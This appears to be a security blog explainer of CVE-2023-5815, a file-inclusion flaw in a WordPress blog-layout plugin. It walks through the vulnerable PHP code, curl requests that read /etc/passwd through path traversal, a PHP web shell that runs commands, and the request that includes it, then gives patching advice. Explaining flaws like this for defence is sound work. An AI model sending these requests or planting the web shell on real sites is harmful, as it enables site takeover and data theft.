Remote Code Execution (RCE) vulnerabilities are among the most dangerous issues for websites. Recently, CVE-2023-5815 was assigned to a critical vulnerability discovered in the popular WordPress plugin: News & Blog Designer Pack. This plugin, used for displaying blog posts in grids, sliders, carousels, tickers, and masonry layouts, is installed on thousands of WordPress websites.
In this long read, we’ll break down exactly how CVE-2023-5815 works, the root cause, how attackers can exploit it, and what you can do to protect your site. This article is tailored to be easy to read, even if you’re not a cyber security expert.
What is CVE-2023-5815?
CVE-2023-5815 is a vulnerability that allows unauthenticated remote code execution through a Local File Inclusion (LFI) bug. An attacker can leverage this flaw to run malicious code and potentially take over your website.
* Plugin Name: News & Blog Designer Pack — (Blog Post Grid, Slider, Carousel, Ticker, Masonry)
* Affected Versions: All versions up to and including 3.4.1
* Download & Details
Technical Root Cause: The bdp_get_more_post Function
The vulnerability exists in the AJAX function called bdp_get_more_post. This function is accessible without authentication via nopriv AJAX in WordPress, meaning attackers don’t even need to log in.
A value from $_POST is passed unsafely into the include() function.
This combination directly allows attackers to control file inclusion—and, in some cases, run their own PHP code.
Let’s look at a simplified version of the vulnerable code
// Vulnerable snippet from plugin
add_action('wp_ajax_nopriv_bdp_get_more_post', 'bdp_get_more_post');
function bdp_get_more_post() {
// UNSAFE: Extracts all POST data into variables
extract($_POST);
// UNSAFE: Includes a file based on untrusted POST data
if (isset($template)) {
include($template . '.php');
}
}
> If an attacker sends a POST request with a custom template value, they control what file gets included.
Use an AJAX POST request to the WordPress admin-ajax.php endpoint.
- Provide a template parameter (for example: ../../../../../../etc/passwd).
`bash
curl -X POST https://victim.site/wp-admin/admin-ajax.php?action=bdp_get_more_post -d "template=../../../../../../etc/passwd"
`
This will try to include the system’s passwd file—which can break the site or display sensitive info.
`bash
curl -X POST https://victim.site/wp-admin/admin-ajax.php?action=bdp_get_more_post -d "template=wp-content/uploads/shell"
Let’s see what such an attack might look like (code for educational purposes only)
<?php
// Malicious PHP code sent in an upload or existing file
// shell.php
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
?>
`
POST /wp-admin/admin-ajax.php?action=bdp_get_more_post
Content-Type: application/x-www-form-urlencoded
template=../../uploads/shell
`
https://victim.site/wp-content/uploads/shell.php?cmd=whoami
References & More Reading
- Original Plugin on WordPress.org
- Official CVE Entry
- Patchstack Threat Alert: CVE-2023-5815
- Wordfence Blog (search for CVE-2023-5815 for updates)
Update Immediately:
The plugin authors have released an updated, safe version. Update the plugin from your WordPress dashboard.
Disable the Plugin if you can’t update right away.
3. Restrict File Uploads and limit PHP execution in wp-content/uploads where possible.
Conclusion
CVE-2023-5815 is a critical risk for any site using the News & Blog Designer Pack.
It doesn’t just leak files; with a bit of creativity, it can allow hackers to run their own PHP code on your site. That means spam, malware, or even total site destruction.
If you use this plugin, patch now. Always keep plugins updated—and keep an eye on your access logs for suspicious activity.
Stay safe!
*If you have further questions or want to report incidents, consult the links above or contact your hosting provider/security team.*
Timeline
Published on: 11/22/2023 16:15:14 UTC
Last modified on: 11/29/2023 19:15:40 UTC